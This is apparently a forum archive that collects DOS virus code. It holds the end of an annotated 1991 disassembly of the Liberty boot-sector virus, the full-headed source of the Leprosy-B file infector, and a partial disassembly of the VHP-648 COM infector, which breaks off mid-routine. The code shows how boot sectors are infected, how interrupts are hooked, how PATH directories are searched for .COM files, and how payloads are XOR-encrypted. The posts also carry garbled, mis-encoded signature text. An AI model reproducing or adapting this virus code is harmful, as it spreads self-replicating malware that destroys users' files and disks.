CS:0668 2E CS:
CS:0669 803EC8060A CMP BYTE PTR [06C8],0A
CS:066E 7446 JZ 06B6
CS:0670 33C0 XOR AX,AX
CS:0672 8ED8 MOV DS,AX
CS:0674 2E CS:
CS:0675 FE06C806 INC BYTE PTR [06C8]
CS:0679 B80803 MOV AX,0308
CS:067C BB1001 MOV BX,0110
CS:067F B93128 MOV CX,2831
CS:0682 33D2 XOR DX,DX
CS:0684 CD13 INT 13
CS:0686 E85200 CALL 06DB ; Set & get vector 13h
CS:0689 2E CS: ;
CS:068A C606470BFF MOV BYTE PTR [0B47],FF ;
CS:068F 90 NOP ;
CS:0690 2E CS: ;
CS:0691 C606950BFF MOV BYTE PTR [0B95],FF ;
CS:0696 90 NOP ;
CS:0697 2E CS: ;
CS:0698 C606080CFF MOV BYTE PTR [0C08],FF ; Switches off
CS:069D 90 NOP
CS:069E E82902 CALL 08CA ; Set & get vector 8h
CS:06A1 E85402 CALL 08F8 ; Set & get vector 1Ch
CS:06A4 E84104 CALL 0AE8 ; Set & get vector 10h
CS:06A7 E85804 CALL 0B02 ; Set & get vector 14h
CS:06AA E86F04 CALL 0B1C ; Set & get vector 17h
CS:06AD E81900 CALL 06C9 ; Read original bootsector
CS:06B0 BB007C MOV BX,7C00 ;
CS:06B3 1E PUSH DS ;
CS:06B4 53 PUSH BX ;
CS:06B5 CB RETF ; Start
CS:06B6 E81000 CALL 06C9 ; Read bootsector
CS:06B9 B80103 MOV AX,0301
CS:06BC BB007C MOV BX,7C00
CS:06BF B90100 MOV CX,0001
CS:06C2 33D2 XOR DX,DX
CS:06C4 CD13 INT 13
CS:06C6 EBE5 JMP 06AD
CS:06C9 33C0 XOR AX,AX
CS:06CB 8EC0 MOV ES,AX
CS:06CD B80102 MOV AX,0201
CS:06D0 BB007C MOV BX,7C00
CS:06D3 B93F28 MOV CX,283F
CS:06D6 33D2 XOR DX,DX
CS:06D8 CD13 INT 13
CS:06DA C3 RET
CS:06DB 33C0 XOR AX,AX
CS:06DD 8ED8 MOV DS,AX
CS:06DF A14C00 MOV AX,[004C]
CS:06E2 2E CS:
CS:06E3 A31608 MOV [0816],AX
CS:06E6 A14E00 MOV AX,[004E]
CS:06E9 2E CS:
CS:06EA A31808 MOV [0818],AX
CS:06ED FA CLI
CS:06EE B8FB07 MOV AX,07FB
CS:06F1 A34C00 MOV [004C],AX
CS:06F4 8C0E4E00 MOV [004E],CS
CS:06F8 C3 RET
;
; Boot sectors are infected via vector 13h
;
CS:06F9 9C PUSHF
CS:06FA 80FC01 CMP AH,01
CS:06FD 7E13 JLE 0712
CS:06FF 80FC04 CMP AH,04
CS:0702 7D0E JGE 0712
CS:0704 80FA80 CMP DL,80
CS:0707 720F JB 0718
CS:0709 E8BE00 CALL 07CA ; Disconnect vector 13h
CS:070C 07 POP ES
CS:070D 1F POP DS
CS:070E 5A POP DX
CS:070F 59 POP CX
CS:0710 5B POP BX
CS:0711 58 POP AX
CS:0712 9D POPF
CS:0713 EA00000000 JMP 0000:0000
CS:0718 50 PUSH AX
CS:0719 53 PUSH BX
CS:071A 51 PUSH CX
CS:071B 52 PUSH DX
CS:071C 1E PUSH DS
CS:071D 06 PUSH ES
CS:071E B80102 MOV AX,0201 ;
CS:0721 0E PUSH CS ;
CS:0722 07 POP ES ;
CS:0723 0E PUSH CS ;
CS:0724 1F POP DS ;
CS:0725 BB420C MOV BX,0C42 ;
CS:0728 B90100 MOV CX,0001 ;
CS:072B 32F6 XOR DH,DH ;
CS:072D 9C PUSHF ;
CS:072E 2E CS: ;
CS:072F FF1E1407 CALL FAR [0714] ; Read Bootsector
CS:0733 72D4 JB 0709
CS:0735 0E PUSH CS
CS:0736 1F POP DS
CS:0737 0E PUSH CS
CS:0738 07 POP ES
CS:0739 BE420C MOV SI,0C42 ;
CS:073C BF3506 MOV DI,0635 ;
CS:073F B90A00 MOV CX,000A ;
CS:0742 FC CLD ;
CS:0743 F3 REPZ ;
CS:0744 A7 CMPSW ; Check infection
CS:0745 74C2 JZ 0709
CS:0747 BE420C MOV SI,0C42
CS:074A 807C02FF CMP BYTE PTR [SI+02],FF ; Was infected ?
CS:074E 744A JZ 079A
CS:0750 B0FF MOV AL,FF
CS:0752 884402 MOV [SI+02],AL
CS:0755 B80905 MOV AX,0509 ;
CS:0758 BBA607 MOV BX,07A6 ;
CS:075B B93128 MOV CX,2831 ;
CS:075E 9C PUSHF ;
CS:075F 2E CS: ;
CS:0760 FF1E1407 CALL FAR [0714] ; Format track 40
CS:0764 72A3 JB 0709
CS:0766 B80103 MOV AX,0301 ;
CS:0769 BB420C MOV BX,0C42 ;
CS:076C B93F28 MOV CX,283F ;
CS:076F 9C PUSHF ;
CS:0770 2E CS: ;
CS:0771 FF1E1407 CALL FAR [0714] ; Write original bootsector
CS:0775 7292 JB 0709
CS:0777 B80103 MOV AX,0301 ;
CS:077A BB3506 MOV BX,0635 ;
CS:077D B90100 MOV CX,0001 ;
CS:0780 9C PUSHF ;
CS:0781 2E CS: ;
CS:0782 FF1E1407 CALL FAR [0714] ; Write Libery bootsector
CS:0786 7281 JB 0709
CS:0788 B80803 MOV AX,0308 ;
CS:078B BB1001 MOV BX,0110 ;
CS:078E B93128 MOV CX,2831 ;
CS:0791 9C PUSHF ;
CS:0792 2E CS: ;
CS:0793 FF1E1407 CALL FAR [0714] ; Write Liberty virus
CS:0797 E96FFF JMP 0709
CS:079A 2E CS: ;
CS:079B C606100300 MOV BYTE PTR [0310],00 ;
CS:07A0 E83B00 CALL 07DE ; Attach ???
CS:07A3 E963FF JMP 0709
;
; The format table is next
;
DS:07A0 28 00-31 02 28 00 32 02 28 00
DS:07B0 33 02 28 00 34 02 28 00-35 02 28 00 36 02 28 00
DS:07C0 37 02 28 00 38 02 28 00-3F 02
;
; Revectoring
;
CS:07CA 33C0 XOR AX,AX
CS:07CC 8ED8 MOV DS,AX
CS:07CE FA CLI
CS:07CF 2E CS:
CS:07D0 A11407 MOV AX,[0714]
CS:07D3 A34C00 MOV [004C],AX
CS:07D6 2E CS:
CS:07D7 A11607 MOV AX,[0716]
CS:07DA A34E00 MOV [004E],AX
CS:07DD C3 RET
CS:07DE 2E CS:
CS:07DF A11407 MOV AX,[0714]
CS:07E2 2E CS:
CS:07E3 A30C03 MOV [030C],AX
CS:07E6 2E CS:
CS:07E7 A11607 MOV AX,[0716]
CS:07EA 2E CS:
CS:07EB A30E03 MOV [030E],AX
CS:07EE B8F702 MOV AX,02F7
CS:07F1 2E CS:
CS:07F2 A31407 MOV [0714],AX
CS:07F5 2E CS:
CS:07F6 8C0E1607 MOV [0716],CS
CS:07FA C3 RET
;
; Boot sectors are infected via vector 13h
;
CS:07FB 9C PUSHF
CS:07FC 80FC03 CMP AH,03
CS:07FF 7213 JB 0814
CS:0801 80FC05 CMP AH,05
CS:0804 730E JNB 0814
CS:0806 80FA80 CMP DL,80
CS:0809 720F JB 081A
CS:080B EB07 JMP 0814
CS:080D 90 NOP
CS:080E 07 POP ES
CS:080F 1F POP DS
CS:0810 5A POP DX
CS:0811 59 POP CX
CS:0812 5B POP BX
CS:0813 58 POP AX
CS:0814 9D POPF
CS:0815 EA00000000 JMP 0000:0000
CS:081A 50 PUSH AX
CS:081B 53 PUSH BX
CS:081C 51 PUSH CX
CS:081D 52 PUSH DX
CS:081E 1E PUSH DS
CS:081F 06 PUSH ES
CS:0820 2E CS:
CS:0821 803E0C0401 CMP BYTE PTR [040C],01
CS:0826 74E6 JZ 080E
CS:0828 B80102 MOV AX,0201 ;
CS:082B 0E PUSH CS ;
CS:082C 07 POP ES ;
CS:082D 0E PUSH CS ;
CS:082E 1F POP DS ;
CS:082F BB420C MOV BX,0C42 ;
CS:0832 B90100 MOV CX,0001 ;
CS:0835 32F6 XOR DH,DH ;
CS:0837 9C PUSHF ;
CS:0838 2E CS: ;
CS:0839 FF1E1608 CALL FAR [0816] ; Read bootsector
CS:083D 72CF JB 080E
CS:083F 0E PUSH CS
CS:0840 1F POP DS
CS:0841 0E PUSH CS
CS:0842 07 POP ES
CS:0843 BE420C MOV SI,0C42 ;
CS:0846 BF3506 MOV DI,0635 ;
CS:0849 B90A00 MOV CX,000A ;
CS:084C FC CLD ;
CS:084D F3 REPZ ;
CS:084E A7 CMPSW ; Check infection
CS:084F 74BD JZ 080E
CS:0851 B0FF MOV AL,FF
CS:0853 884702 MOV [BX+02],AL
CS:0856 B80905 MOV AX,0509 ;
CS:0859 BBA607 MOV BX,07A6 ;
CS:085C B93128 MOV CX,2831 ;
CS:085F 9C PUSHF ;
CS:0860 2E CS: ;
CS:0861 FF1E1608 CALL FAR [0816] ; Format track 28
CS:0865 72A7 JB 080E
CS:0867 B80103 MOV AX,0301 ;
CS:086A BB420C MOV BX,0C42 ;
CS:086D B93F28 MOV CX,283F ;
CS:0870 9C PUSHF ;
CS:0871 2E CS: ;
CS:0872 FF1E1608 CALL FAR [0816] ; Write original bootsector
CS:0876 7296 JB 080E
CS:0878 B80103 MOV AX,0301 ;
CS:087B BB3506 MOV BX,0635 ;
CS:087E B90100 MOV CX,0001 ;
CS:0881 9C PUSHF ;
CS:0882 2E CS: ;
CS:0883 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector
CS:0887 7285 JB 080E
CS:0889 B80803 MOV AX,0308 ;
CS:088C BB1001 MOV BX,0110 ;
CS:088F B93128 MOV CX,2831 ;
CS:0892 9C PUSHF ;
CS:0893 2E CS: ;
CS:0894 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector
CS:0898 E973FF JMP 080E
CS:089B 9C PUSHF
CS:089C 50 PUSH AX
CS:089D 1E PUSH DS
CS:089E 33C0 XOR AX,AX
CS:08A0 8ED8 MOV DS,AX
CS:08A2 833E860000 CMP WORD PTR [0086],+00 ;
CS:08A7 750F JNZ 08B8 ; Check if DOS is installed
CS:08A9 833E840000 CMP WORD PTR [0084],+00 ;
CS:08AE 7508 JNZ 08B8
CS:08B0 1F POP DS
CS:08B1 58 POP AX
CS:08B2 9D POPF
CS:08B3 EA00000000 JMP 0000:0000
CS:08B8 06 PUSH ES
CS:08B9 0E PUSH CS
CS:08BA 07 POP ES
CS:08BB E8C3F9 CALL 0281 ; Get vector 21h
CS:08BE E8F1F9 CALL 02B2 ; Set vector 21h
CS:08C1 E82000 CALL 08E4 ; Disconnect vector 8h
CS:08C4 E8FBF9 CALL 02C2 ; Set installation flag
CS:08C7 07 POP ES
CS:08C8 EBE6 JMP 08B0
;
; Revectoring
;
CS:08CA A12000 MOV AX,[0020]
CS:08CD 2E CS:
CS:08CE A3B408 MOV [08B4],AX
CS:08D1 A12200 MOV AX,[0022]
CS:08D4 2E CS:
CS:08D5 A3B608 MOV [08B6],AX
CS:08D8 B89B08 MOV AX,089B
CS:08DB FA CLI
CS:08DC A32000 MOV [0020],AX
CS:08DF 8C0E2200 MOV [0022],CS
CS:08E3 C3 RET
CS:08E4 33C0 XOR AX,AX
CS:08E6 8ED8 MOV DS,AX
CS:08E8 FA CLI
CS:08E9 2E CS:
CS:08EA A1B408 MOV AX,[08B4]
CS:08ED A32000 MOV [0020],AX
CS:08F0 2E CS:
CS:08F1 A1B608 MOV AX,[08B6]
CS:08F4 A32200 MOV [0022],AX
CS:08F7 C3 RET
CS:08F8 A17000 MOV AX,[0070]
CS:08FB 2E CS:
CS:08FC A3900A MOV [0A90],AX
CS:08FF A17200 MOV AX,[0072]
CS:0902 2E CS:
CS:0903 A3920A MOV [0A92],AX
CS:0906 B8580A MOV AX,0A58
CS:0909 FA CLI
CS:090A A37000 MOV [0070],AX
CS:090D 8C0E7200 MOV [0072],CS
CS:0911 C3 RET
;
; The next routine displays 'M A G I C ! !' on the screen for a second
;
CS:0912 50 PUSH AX
CS:0913 53 PUSH BX
CS:0914 51 PUSH CX
CS:0915 52 PUSH DX
CS:0916 56 PUSH SI
CS:0917 57 PUSH DI
CS:0918 1E PUSH DS
CS:0919 06 PUSH ES
CS:091A 9C PUSHF
CS:091B BB00B8 MOV BX,B800 ;
CS:091E 8EDB MOV DS,BX ;
CS:0920 0E PUSH CS ;
CS:0921 07 POP ES ;
CS:0922 33F6 XOR SI,SI ;
CS:0924 BF6809 MOV DI,0968 ;
CS:0927 B9A000 MOV CX,00A0 ;
CS:092A F3 REPZ ;
CS:092B A4 MOVSB ; Save screen
CS:092C BB00B8 MOV BX,B800 ;
CS:092F 8EC3 MOV ES,BX ;
CS:0931 0E PUSH CS ;
CS:0932 1F POP DS ;
CS:0933 33FF XOR DI,DI ;
CS:0935 BB080A MOV BX,0A08 ;
CS:0938 B95000 MOV CX,0050 ;
CS:093B B6CE MOV DH,CE ;
CS:093D 8A17 MOV DL,[BX] ;
CS:093F 80EA03 SUB DL,03 ;
CS:0942 26 ES: ;
CS:0943 8915 MOV [DI],DX ;
CS:0945 47 INC DI ;
CS:0946 47 INC DI ;
CS:0947 43 INC BX ;
CS:0948 E2F3 LOOP 093D ; Put text on screen
CS:094A E2FE LOOP 094A ; Wait
CS:094C BB00B8 MOV BX,B800 ;
CS:094F 8EC3 MOV ES,BX ;
CS:0951 0E PUSH CS ;
CS:0952 1F POP DS ;
CS:0953 33FF XOR DI,DI ;
CS:0955 BE6809 MOV SI,0968 ;
CS:0958 B9A000 MOV CX,00A0 ;
CS:095B F3 REPZ ;
CS:095C A4 MOVSB ; Restore screen
CS:095D 9D POPF
CS:095E 07 POP ES
CS:095F 1F POP DS
CS:0960 5F POP DI
CS:0961 5E POP SI
CS:0962 5A POP DX
CS:0963 59 POP CX
CS:0964 5B POP BX
CS:0965 58 POP AX
CS:0966 C3 RET
;
; A temporary screen buffer
;
DS:0960 4D 41 47 49 43 4D 41 47
DS:0970 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49
DS:0980 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43
DS:0990 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D
DS:09A0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41
DS:09B0 47 49 43 4D 41 47 49 43-4D 41 47 49 43 4D 41 47
DS:09C0 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49
DS:09D0 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43
DS:09E0 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D
DS:09F0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41
DS:0A00 47 49 43 4D 41 47 49 43
;
; The encrypted text 'M A G I C ! !'
;
DS:0A00 23 23 23 23 23 23 23 23
DS:0A10 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23
DS:0A20 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23
DS:0A30 23 23 23 23 23 23 23 23-23 23 50 23 44 23 4A 23
DS:0A40 4C 23 46 23 23 24 23 24-23 24 23 23 23 23 23 23
DS:0A50 23 23 23 23 23 23 23 23
;
; The next routine is the timer routine. It activates all the gadgets.
;
CS:0A58 9C PUSHF
CS:0A59 50 PUSH AX
CS:0A5A 1E PUSH DS
CS:0A5B 2E CS:
CS:0A5C FF06940A INC WORD PTR [0A94]
CS:0A60 2E CS:
CS:0A61 833E960A0B CMP WORD PTR [0A96],+0B ; Time for a reboot ?
CS:0A66 7433 JZ 0A9B
CS:0A68 2E CS:
CS:0A69 A1980A MOV AX,[0A98]
CS:0A6C 2E CS:
CS:0A6D 3906940A CMP [0A94],AX ; Time for gadgets on ?
CS:0A71 7430 JZ 0AA3
CS:0A73 7217 JB 0A8C
CS:0A75 050002 ADD AX,0200
CS:0A78 2E CS:
CS:0A79 3906940A CMP [0A94],AX ; Time for gadgets off ?
CS:0A7D 7446 JZ 0AC5
CS:0A7F 770B JA 0A8C
CS:0A81 2E CS:
CS:0A82 833E960A0A CMP WORD PTR [0A96],+0A ; Time for screen messing ?
CS:0A87 7503 JNZ 0A8C
CS:0A89 E886FE CALL 0912 ; Mess up screen
CS:0A8C 1F POP DS
CS:0A8D 58 POP AX
CS:0A8E 9D POPF
CS:0A8F EA00000000 JMP 0000:0000 ; Continue
CS:0A9B B8FFFF MOV AX,FFFF
CS:0A9E 50 PUSH AX
CS:0A9F 33C0 XOR AX,AX
CS:0AA1 50 PUSH AX
CS:0AA2 CB RETF
CS:0AA3 2E CS:
CS:0AA4 812E980A5001 SUB WORD PTR [0A98],0150
CS:0AAA 33C0 XOR AX,AX
CS:0AAC 8ED8 MOV DS,AX
CS:0AAE 2E CS:
CS:0AAF C606470B00 MOV BYTE PTR [0B47],00
CS:0AB4 90 NOP
CS:0AB5 2E CS:
CS:0AB6 C606950B00 MOV BYTE PTR [0B95],00
CS:0ABB 90 NOP
CS:0ABC 2E CS:
CS:0ABD C606080C00 MOV BYTE PTR [0C08],00
CS:0AC2 90 NOP
CS:0AC3 EBC7 JMP 0A8C
CS:0AC5 2E CS:
CS:0AC6 C606470BFF MOV BYTE PTR [0B47],FF
CS:0ACB 90 NOP
CS:0ACC 2E CS:
CS:0ACD C606950BFF MOV BYTE PTR [0B95],FF
CS:0AD2 90 NOP
CS:0AD3 2E CS:
CS:0AD4 C606080CFF MOV BYTE PTR [0C08],FF
CS:0AD9 90 NOP
CS:0ADA 2E CS:
CS:0ADB C706940A0000 MOV WORD PTR [0A94],0000
CS:0AE1 2E CS:
CS:0AE2 FF06960A INC WORD PTR [0A96]
CS:0AE6 EBA4 JMP 0A8C
CS:0AE8 A14000 MOV AX,[0040]
CS:0AEB 2E CS:
CS:0AEC A3430B MOV [0B43],AX
CS:0AEF A14200 MOV AX,[0042]
CS:0AF2 2E CS:
CS:0AF3 A3450B MOV [0B45],AX
CS:0AF6 B8360B MOV AX,0B36
CS:0AF9 FA CLI
CS:0AFA A34000 MOV [0040],AX
CS:0AFD 8C0E4200 MOV [0042],CS
CS:0B01 C3 RET
CS:0B02 FA CLI
CS:0B03 A15000 MOV AX,[0050]
CS:0B06 2E CS:
CS:0B07 A3910B MOV [0B91],AX
CS:0B0A A15200 MOV AX,[0052]
CS:0B0D 2E CS:
CS:0B0E A3930B MOV [0B93],AX
CS:0B11 B8840B MOV AX,0B84
CS:0B14 A35000 MOV [0050],AX
CS:0B17 8C0E5200 MOV [0052],CS
CS:0B1B C3 RET
CS:0B1C FA CLI
CS:0B1D A15C00 MOV AX,[005C]
CS:0B20 2E CS:
CS:0B21 A3040C MOV [0C04],AX
CS:0B24 A15E00 MOV AX,[005E]
CS:0B27 2E CS:
CS:0B28 A3060C MOV [0C06],AX
CS:0B2B B8FC0B MOV AX,0BFC
CS:0B2E A35C00 MOV [005C],AX
CS:0B31 8C0E5E00 MOV [005E],CS
CS:0B35 C3 RET
;
; Now the gadgets' routines. When activated, only the word MAGIC!! will be
; sent to screen, port, and printer.
;
CS:0B36 9C PUSHF ; Screen
CS:0B37 80FC09 CMP AH,09
CS:0B3A 740F JZ 0B4B
CS:0B3C 80FC0A CMP AH,0A
CS:0B3F 740A JZ 0B4B
CS:0B41 9D POPF
CS:0B42 EA00000000 JMP 0000:0000
CS:0B4B 2E CS:
CS:0B4C 803E470BFF CMP BYTE PTR [0B47],FF
CS:0B51 74EE JZ 0B41
CS:0B53 53 PUSH BX
CS:0B54 56 PUSH SI
CS:0B55 50 PUSH AX
CS:0B56 33DB XOR BX,BX
CS:0B58 2E CS:
CS:0B59 833E480B07 CMP WORD PTR [0B48],+07
CS:0B5E 7507 JNZ 0B67
CS:0B60 2E CS:
CS:0B61 C706480B0000 MOV WORD PTR [0B48],0000
CS:0B67 2E CS:
CS:0B68 8B1E480B MOV BX,[0B48]
CS:0B6C 2E CS:
CS:0B6D 8B3E480B MOV DI,[0B48]
CS:0B71 47 INC DI
CS:0B72 2E CS:
CS:0B73 893E480B MOV [0B48],DI
CS:0B77 BE3B0C MOV SI,0C3B
CS:0B7A 58 POP AX
CS:0B7B 2E CS:
CS:0B7C 8A00 MOV AL,[BX+SI]
CS:0B7E FEC0 INC AL
CS:0B80 5E POP SI
CS:0B81 5B POP BX
CS:0B82 EBBD JMP 0B41
CS:0B84 9C PUSHF ; Port
CS:0B85 80FC01 CMP AH,01
CS:0B88 740D JZ 0B97
CS:0B8A 80FC02 CMP AH,02
CS:0B8D 7436 JZ 0BC5
CS:0B8F 9D POPF
CS:0B90 EA00000000 JMP 0000:0000
CS:0B97 2E CS:
CS:0B98 803E950BFF CMP BYTE PTR [0B95],FF
CS:0B9D 74F0 JZ 0B8F
CS:0B9F 53 PUSH BX
CS:0BA0 56 PUSH SI
CS:0BA1 33DB XOR BX,BX
CS:0BA3 2E CS:
CS:0BA4 8A1E960B MOV BL,[0B96]
CS:0BA8 BE3B0C MOV SI,0C3B
CS:0BAB 2E CS:
CS:0BAC 8A00 MOV AL,[BX+SI]
CS:0BAE 2E CS:
CS:0BAF FE06960B INC BYTE PTR [0B96]
CS:0BB3 2E CS:
CS:0BB4 803E960B07 CMP BYTE PTR [0B96],07
CS:0BB9 7506 JNZ 0BC1
CS:0BBB 2E CS:
CS:0BBC C606960B00 MOV BYTE PTR [0B96],00
CS:0BC1 5E POP SI
CS:0BC2 5B POP BX
CS:0BC3 EBCA JMP 0B8F
CS:0BC5 2E CS:
CS:0BC6 803E950BFF CMP BYTE PTR [0B95],FF
CS:0BCB 74C2 JZ 0B8F
CS:0BCD 2E CS:
CS:0BCE FF1E910B CALL FAR [0B91]
CS:0BD2 80FC00 CMP AH,00
CS:0BD5 7F24 JG 0BFB
CS:0BD7 53 PUSH BX
CS:0BD8 56 PUSH SI
CS:0BD9 33DB XOR BX,BX
CS:0BDB 2E CS:
CS:0BDC 8A1E960B MOV BL,[0B96]
CS:0BE0 BE3B0C MOV SI,0C3B
CS:0BE3 2E CS:
CS:0BE4 8A00 MOV AL,[BX+SI]
CS:0BE6 2E CS:
CS:0BE7 FE06960B INC BYTE PTR [0B96]
CS:0BEB 2E CS:
CS:0BEC 803E960B07 CMP BYTE PTR [0B96],07
CS:0BF1 7506 JNZ 0BF9
CS:0BF3 2E CS:
CS:0BF4 C606960B00 MOV BYTE PTR [0B96],00
CS:0BF9 5E POP SI
CS:0BFA 5B POP BX
CS:0BFB CF IRET
CS:0BFC 9C PUSHF ; Printer
CS:0BFD 80FC00 CMP AH,00
CS:0C00 7407 JZ 0C09
CS:0C02 9D POPF
CS:0C03 EA00000000 JMP 0000:0000
CS:0C09 2E CS:
CS:0C0A 803E080CFF CMP BYTE PTR [0C08],FF
CS:0C0F 74F1 JZ 0C02
CS:0C11 53 PUSH BX
CS:0C12 56 PUSH SI
CS:0C13 33DB XOR BX,BX
CS:0C15 2E CS:
CS:0C16 8A1E3A0C MOV BL,[0C3A]
CS:0C1A BE3B0C MOV SI,0C3B
CS:0C1D 2E CS:
CS:0C1E 8A00 MOV AL,[BX+SI]
CS:0C20 FEC0 INC AL
CS:0C22 2E CS:
CS:0C23 FE063A0C INC BYTE PTR [0C3A]
CS:0C27 2E CS:
CS:0C28 803E3A0C07 CMP BYTE PTR [0C3A],07
CS:0C2D 7507 JNZ 0C36
CS:0C2F 2E CS:
CS:0C30 C6063A0C00 MOV BYTE PTR [0C3A],00
CS:0C35 90 NOP
CS:0C36 5E POP SI
CS:0C37 5B POP BX
CS:0C38 EBC8 JMP 0C02
;
; The encrypted text 'MAGIC!!'
;
DS:0C3A 4C 40 46 48 42 20 20
;
; Important note:
; When there is no longer space on the disk to infect a file, the Liberty
; virus will infect the bootsector. This is done in the 'OHIO' way.
;
;
;
; End of Liberty (2867) disassembly. (c) 1991 by Remco van Helvoort.
; This document may be freely shared. If you have any comments or some
; nice little viruses for analysis, feel free to drop me a note.
;
; Remco van Helvoort
; Bredastraat 3
; 5224 VD 's-Hertogenbosch
; Holland
;

; ننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننن
; نننننننننننننننننننن> and Remember Don't Forget to Call <نننننننننننننننن
; نننننننننننن> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <نننننننننن
; ننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننننن

Hص ر ×زدؤإ ×سإ سثءعءج... يدضإش إفإ قشد ؤدآء×جہ ذدشدح...
[–] ًدثء _All_ !

ژ،ڈ،پ،ژ،پپ،، DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2،5080ژ244،0 FTP://87.224.224.182

... ïب, ة ثءثصجة...

John Zaicev

unread,

May 18, 2012, 5:04:43 PM5/18/12

to

[√] Привет _All_ !

; <LEPROSYB.ASM> - Leprosy-B Virus Source
; Copy-ya-right (c) 1990 by PCM2.
;
; This file is the source code to the Leprosy-B virus. It should
; be assembled with an MASM-compatible assembler; it has been tested
; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0.
; It should be made into a .COM file before executing, with either
; the "/t" command line flag in TLINK or Microsoft's EXE2BIN utility.
;
; This program has the potential to permanently destroy executable
; images on any disk medium. Other modifications may have been made
; subsequent to the original release by the author, either benign,
; or which could result in further harm should this program be run.
; In any case, the author assumes no responsibility for any damage
; caused by this program, incidental or otherwise. As a precaution,
; this program should not be turned over to irresponsible hands...
; (unlike people like us, that is).

title "Leprosy-B Virus by PCM2, August 1990"

cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 666 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute

code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP

;---------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
;---------------------------------------------------------------------
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action

encrypt_val db 00h ; Hold value to encrypt by here

; ---------- Encrypt, save, and restore the virus code -----------
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle

mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
call encrypt_decrypt ; Restore the code as it was
ret ; Go back to where you came from

; --------------- Encrypt or decrypt the virus code ----------------
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Запомни, сынок: живот - не ОТ пива, живот - ДЛЯ пива!

John Zaicev

unread,

May 19, 2012, 7:09:43 PM5/19/12

to

[√] Привет _All_ !

name Virus
title Disassembly listing of the VHP-648 virus
.radix 16

code segment
assume cs:code,ds:code

org 100
environ equ 2C

start:
jmp virus

message db 'Hello, world!$'

mov ah,9
mov dx,offset message
int 21
int 20

virus:
push cx ;Save CX

mov dx,offset data ;Restore original first instruction
modify equ $-2 ;The instruction above is changed
; before each contamination
cld
mov si,dx
add si,saveins-data ;Instruction saved there
mov di,offset start
mov cx,3 ;Move 3 bytes
rep movsb ;Do it
mov si,dx ;Keep SI pointed at data

mov ah,30 ;Get DOS version
int 21
cmp al,0 ;Less than 2.0?
jne skip1
jmp exit ;Exit if so

skip1:
push es ;Save ES
mov ah,2F ;Get current DTA in ES:BX
int 21
mov word ptr [si+0],bx ;dtaadr
mov word ptr [si+2],es
pop es ;Restore ES

mov dx,mydta-data
add dx,si
mov ah,1A ;Set DTA
int 21

push es ;Save ES & SI
push si
mov es,ds:[environ] ;Environment address
mov di,0
n_00015A: ;Search 'PATH=' in the environment
pop si ;Restore data offset in SI
push si
add si,pathstr-data
lodsb
mov cx,8000 ;Maximum 32K in environment
repne scasb ;Search for first letter ('P')
mov cx,4 ;4 letters in 'PATH'
n_000169:
lodsb ;Search for next char
scasb
jne n_00015A ;If not found, search for next 'P'
loop n_000169 ;Loop until done
pop si ;Restore SI & ES
pop es

mov [si+16],di ;Save 'PATH' offset in poffs
mov di,si
add di,fname-data ;Point SI & DI at '=' sign
mov bx,si ;Point BX at data area
add si,fname-data
mov di,si
jmp short n_0001BF

n_000185:
cmp word ptr [si+16],6C ;poffs
jne n_00018F
jmp olddta
n_00018F:
push ds
push si
mov ds,es:[environ]
mov di,si
mov si,es:[di+16] ;poffs
add di,fname-data
n_0001A1:
lodsb
cmp al,';'
je n_0001B0
cmp al,0
je n_0001AD
stosb
jmp n_0001A1
n_0001AD:
mov si,0
n_0001B0:
pop bx
pop ds
mov [bx+16],si ;poffs
cmp byte ptr [di-1],'\'
je n_0001BF
mov al,'\' ;Add '\' if not already present
stosb

n_0001BF:
mov [bx+18],di ;Save '=' offset in eqoffs
mov si,bx ;Restore data pointer in SI
add si,allcom-data
mov cx,6 ;6 bytes in ASCIIZ '*.COM'
rep movsb ;Move '*.COM' at fname
mov si,bx ;Restore SI

mov ah,4E ;Find first file
mov dx,fname-data
add dx,si
mov cx,11b ;Hidden, Read/Only or Normal files
int 21
jmp short n_0001E3

findnext:
mov ah,4F ;Find next file
int 21
n_0001E3:
jnc n_0001E7 ;If found, try to contaminate it
jmp n_000185 ;Otherwise search in another directory

n_0001E7:
mov ax,[si+75] ;Check file time
and al,11111b ; (the seconds, more exactly)
cmp al,62d/2 ;Are they 62?

